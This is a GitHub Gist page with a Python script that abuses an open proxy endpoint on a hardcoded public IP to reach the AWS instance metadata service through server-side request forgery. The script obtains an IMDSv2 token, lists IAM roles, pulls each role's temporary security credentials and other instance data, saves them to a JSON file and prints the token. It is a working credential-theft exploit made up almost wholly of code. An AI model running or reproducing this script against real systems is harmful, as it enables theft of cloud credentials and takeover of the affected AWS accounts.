Created
August 5, 2025 09:35
-
-
Save lawbyte/3008241a44aff6f5c3a159c7a4b3733f to your computer and use it in GitHub Desktop.
get aws metadata token
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import httpx | |
| import json | |
| from datetime import datetime | |
| client = httpx.Client() | |
| base_url = "http://54.251.250.184:5000/proxy" | |
| metadata_url = "http://169.254.169.254" | |
| # Get metadata token | |
| token_url = f"{base_url}?url={metadata_url}/latest/api/token&method=PUT" | |
| headers = {"X-aws-ec2-metadata-token-ttl-seconds": "21600"} | |
| meta_token = client.get(token_url, headers=headers).text | |
| # Add token to headers for subsequent requests | |
| headers["X-aws-ec2-metadata-token"] = meta_token | |
| def get_metadata(endpoint): | |
| """Get metadata from specific endpoint""" | |
| url = f"{base_url}?url={metadata_url}/latest/meta-data/{endpoint}&method=GET" | |
| try: | |
| response = client.get(url, headers=headers) | |
| return response.text.strip() | |
| except: | |
| return None | |
| # Collect all metadata | |
| metadata = {} | |
| # Basic instance metadata | |
| basic_endpoints = [ | |
| "instance-id", "ami-id", "instance-type", "placement/region", | |
| "placement/availability-zone", "security-groups", "public-ipv4", | |
| "local-ipv4", "hostname", "public-hostname", "local-hostname", | |
| "reservation-id", "instance-life-cycle", "instance-action" | |
| ] | |
| for endpoint in basic_endpoints: | |
| value = get_metadata(endpoint) | |
| if value: | |
| metadata[f"meta-data/{endpoint}"] = value | |
| # Get IAM roles | |
| iam_roles_response = get_metadata("iam/security-credentials/") | |
| if iam_roles_response: | |
| iam_roles = [role.strip() for role in iam_roles_response.split('\n') if role.strip()] | |
| metadata["iam_roles"] = iam_roles | |
| # Get credentials for each role | |
| for role in iam_roles: | |
| creds = get_metadata(f"iam/security-credentials/{role}") | |
| if creds: | |
| try: | |
| creds_json = json.loads(creds) | |
| metadata[f"iam_credentials_{role}"] = creds_json | |
| except: | |
| metadata[f"iam_credentials_{role}"] = creds | |
| # Get network interfaces | |
| network_interfaces_response = get_metadata("network/interfaces/macs/") | |
| if network_interfaces_response: | |
| network_interfaces = [mac.strip() for mac in network_interfaces_response.split('\n') if mac.strip()] | |
| metadata["network_interfaces"] = network_interfaces | |
| # Get details for each network interface | |
| for mac in network_interfaces: | |
| mac_details = get_metadata(f"network/interfaces/macs/{mac}") | |
| if mac_details: | |
| metadata[f"network_interface_{mac}"] = mac_details | |
| # Get other metadata | |
| other_endpoints = [ | |
| "identity-credentials", "public-keys", "services", "system", "profile" | |
| ] | |
| for endpoint in other_endpoints: | |
| value = get_metadata(endpoint) | |
| if value: | |
| metadata[endpoint] = value | |
| # Create final result | |
| result = { | |
| "token": meta_token, | |
| "metadata": metadata, | |
| "timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S") | |
| } | |
| # Save to file | |
| with open("aws_metadata_extraction2.json", "w") as f: | |
| json.dump(result, f, indent=2) | |
| print("Metadata extraction completed and saved to aws_metadata_extraction2.json") | |
| print(f"Token: {meta_token}") | |
| print(f"Instance ID: {metadata.get('meta-data/instance-id', 'N/A')}") | |
| print(f"Region: {metadata.get('meta-data/placement/region', 'N/A')}") | |
| print(f"Public IP: {metadata.get('meta-data/public-ipv4', 'N/A')}") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment